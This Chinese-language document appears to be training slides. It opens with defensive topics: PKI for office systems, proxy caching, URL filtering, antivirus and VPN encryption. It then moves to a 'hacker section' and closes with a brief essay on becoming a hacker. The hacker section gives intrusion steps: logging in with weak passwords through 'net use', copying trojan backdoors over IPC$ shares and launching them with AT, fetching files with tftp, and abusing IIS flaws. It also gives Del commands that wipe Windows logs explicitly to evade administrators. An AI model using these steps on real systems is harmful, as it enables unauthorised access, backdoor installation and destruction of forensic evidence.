如何防止发件人的抵赖行为安全办公自动化系统的解决方法·将PKI体系应用到办公自动化系统中·工作流信息的加密和解密以实现数据保密·工作流信息的数字签名(鉴别)实现发件人认证和不可抵赖。·完整性校验功能防止信息传输过程中被篡改可靠的安全性。·采用公开密钥和对称密钥相结合的密钥体系·支持128bit对称密钥算法和1024bit公开密钥算法。Internet访问及控制系统·Internet使用存在的问题·Internet使用的解决方法·内容缓存系统·Internet站点过滤系统Internet访问存在的问题·Internet接入带宽不足,访问比较慢。·大量的用户访问相同的内容,造成带宽的进一步拥挤。·在上班时间里大量的Internet访问是与业务无关的。·有人使用公司的Internet系统访问色情网站。·有人使用公司的Internet系统访问反动站点。·管理人员无法知道Internet系统的使用情况。Internet访问的解决方法· 对于问题一,采用内容缓存系统。· 对于问题二,采用Internet 站点过滤系统。内容缓存系统·1、Client 发起http连接请求·2、Proxy 收到请求后将检查内部缓存内是否有所需内容,若有,则返还给Client。·3、若无,则Proxy根据请求向目的服务器发起请求。·4、Web服务器将内容返回到Proxy服务器。·5、Proxy服务器将得到的内容发回给Client,并在自己的缓存中保存一份。Internet站点过滤系统 (一) ·1、Client 发起http连接请求·2、连接到达防火墙时防火墙将URL送到WebSense Server 检查。·3、WebSense 将审查结果返回到防火墙。·4、防火墙根据其策略决定是否让该连接通过。Internet站点过滤系统 (二) ·1、Client 发起http连接请求·2、Proxy 受到请求后将URL送到WebSense Server检查。·3、Proxy根据返回的结果决定是否接收该连接请求。病毒防范系统· 互连网时代对防病毒系统的要求· 计算机病毒解决方法· 典型病毒防范系统部署互联网时代对防病毒系统的要求· 由于计算机的联网使用,使得病毒传播的途径大为增多:网络文件共享、电子邮件、Int ernet文件下载,传播速度也大为加快。· 新病毒的出现速度加快,用户的防病毒软件的病毒特征码没能及时更新。· 目前已出现了恶意的Java、ActiveX,当使用者浏览到包含这些代码的网页时,会造成安全问题。· 一些来历不明的电子邮件程序或下载的程序中带有特洛依木马,可能会造成受害者的主机被他人控制。计算机病毒解决方法· 从系统的观点考虑病毒的防范,在所有病毒传输的途径上均配置防病毒软件,如客户端(Win98、 · Win2000)、文件服务器(NT、Netware)、邮件服务器(Exchange、Lotus Notes)、Internet接入系统(Proxy、Firewall)等。· 整个病毒防范系统采用集中管理的方式,病毒特征码统一更新,安全策略集中设定,从而使得整个网络系统的病毒特征码得到快速更新。· 通过在客户端的浏览器和Proxy、Firewall中嵌入病毒检查软件,来防范下在程序中带有的病毒和可能的恶意Java、ActiveX等可执行代码的攻击。VPN(虚拟私有网)· 数据加密分类· 物理线路加密· 数据链路加密· 网络层加密-IPSec · 传输层加密-SSL 数据加密类型·物理层-物理层 物理线路加密·数据链路层-数据链路层 (路由器访问) ·在数据链路层(如PPP)进行加密 L2TP、PPTP、L2F ·网络层-网络层(路由器 防火墙 主机) ·在网络层 (如IP)进行加密 IPSec ·传输层-传输层 (对TCP进行加密 SSL) ·应用层-应用层(在应用层 (如TCP)进行加密 S/MIME、SET、SSH) 物理线路加密· DDN 加密机· 帧中继加密机· 异步拨号Modem · ISDN线路密码机· ATM加密机注:传输层加密·Secure Sockets Layer (SSL) 是一个端到端的Internet 安全协议,通过采用数字证书,它提供了数据加密、身份认证的功能。SSL建立在传输层,它为客户机和服务器在应用级建立起一个端到断的安全会话。·SSL代理-128位的高强度加密模块结束语·恭喜你: ·学完这些并且可以熟练应用,已经是一个真正的网络安全专家了! ·希望此时的你旁边有个温柔稍有点调皮的女朋友,为这孤独而寂寞的网络添加一点跳动的色彩! 黑客编:必须要掌握的几个命令·Net ·netsh ·Ftp ·hostname ·Telenet(nc) ·tracert ·At ·Tftp ·Netstat ·Regedit ·Ping 必须要掌握的几个协议·http ·dns ·ftp ·Pop ·Smtp ·Icmp ·Udp ·tcp 开始·掌握了黑客攻击的方式和手段后,那么学习黑客就简单多了! ·因为你掌握了这些,剩余的就是使用工具入侵·熟悉掌握一套自己用的黑客工具高级·自己编写专用的黑客工具·自己发现系统漏洞黑客入侵手段·收集信息: · 收集要入侵的目标信息· IP,域名,端口,漏洞,位置弱口令·在nt\2000\xp\2003中弱口令可以用·Net use \ip “password” /user:user ·如果目标机开3389服务,可以直接连接·在sql的sa弱口令,可以用sql连接器直接 ·登陆后门木马·如果有ipc$共享,可以copy过去木马后门·用at启动·AT \ip time /INTERACTIVE ·如果可以得到shell,也可以用tftp ·T -i ip get *.* *.* ·然后直接安装 ·如果有3389,可以自己建一个iis,下载 直接运行密码破解·远程破解mysql,mssql,ftp,mail,共享密码·本地破解管理员(administrator)密码缓冲溢出·可以用缓冲溢出攻击, ·比如流行的webdev,rdcom模块漏洞·可以直接得到system管理权限·缓冲溢出后的一般现象是: ·Microsoft Windows 2000 [Version 5.00.2195] (C) Copyright 1985-2000 Microsoft Corp. C:\WINNT\system32 Web服务漏洞·例如: ·Unicode漏洞遍历磁盘和执行程序·二次编码漏洞遍历磁盘和执行程序·.HTR漏洞查看源代码嗅探监听·例如: ·针对web监听·针对mail监听·工具如:sinffer , iris 欺骗攻击·例如: ·运用arp欺骗攻击伪装欺骗·常见的如:mail病毒·把一个文件改名字甚至图标,欺骗对方执行社会工程学·例如: ·QQ聊天诱惑·EMAIL信息·电话·诱惑拒绝服务·例如: ·Dos攻击·Ddos攻击利用跳板·利用自己的肉鸡作为跳板攻击别的机器·My PC------跳板(肉鸡)---目标路由器漏洞·如: ·原始密码·程序漏洞防火墙·利用欺骗攻击防火墙,导致防火墙功能失效·利用防火墙的模块漏洞unix/linux ·NetWare Linux unix solais Solaris hp-unix Aix 等·这些目前先不讲解精通黑客工具·必须有一套自己可以完全掌握的黑客工具·如端口扫描 Nscan,bluescanport ·监听工具:sinffer iris ·telnet工具:nc ·扫描工具:sss,nmap, LANguard ·后门工具:radmin,winshell ·密码破解:lc4 ·远程管理:pcanywhere ·会使用各种经典的黑客工具清除日志·在你入侵机器以后,离开的时候,要完全清除·自己在那台机器上留下的痕迹·例如清除·Del C:\WINNT\system32\LogFiles\*.* ·Del C:\WINNT\system32\*.log ·Del C:\WINNT\system32\*.txt ·Del C:\WINNT\*.log ·Del c:\winnt\*.txt 如果你不清除日志·当目标机器的管理员发现你的证据·完全可以让你在大墙内渡过一段日子黑客·当你完全掌握这些后·你就成为了一名小黑客高级·编写自己的黑客工具·发现系统漏洞高级黑客·目前你足以成为一个高级黑客了真正的黑客·精通各种网络协议·精通操作系统·精通编程技术·精通安全防护·不搞破坏·挑战技术难题结束·想学好这些,并不是靠别人给你的,而是靠自己的努力,自己的自学得到的! ·别人只能指导你,怎么去做,只能告诉方法, ·真正的实施是你自己,经过N*N个日夜努力换来的·不要一个问题问多次,要多动手,动脑! ·Google里面有太多的答案,为什么我搜索不到?因为你的关键字用的不对! ·黑客基地是为了培养出一批优秀的网络人才,让更多想学习网络的爱好者有一个理想的学习环境.
如何变成黑客
黑客这种东西,这个职业,没有厉不厉害之分,技术是学不完的,也是层出不穷的,每次爆发一个漏洞,或者是新的技术都要去快速跟进,不知道题主的厉害是指什么程度,可以入侵美国白宫?还是做黑产赚很多的钱?也就是说,没有厉不厉害之分。
个人感觉,黑客这个技术,只有阶段之分,比入门阶段,基础阶段,进阶阶段,就进阶阶段而言,就是个无底洞,要不断的进阶,学一辈子都学不完,当你看到一个很“厉害”的黑客的时候,其实只是相对你而言,只是他的经验和知识面比你多。
也就是说,你要成为一个厉害的黑客,就要不断的追赶和超越,遇到一个比你厉害的黑客,那你就应该以他为目标,要超越他,就这样不断的去超越,这样你在自己的意义上,就是最厉害的黑客。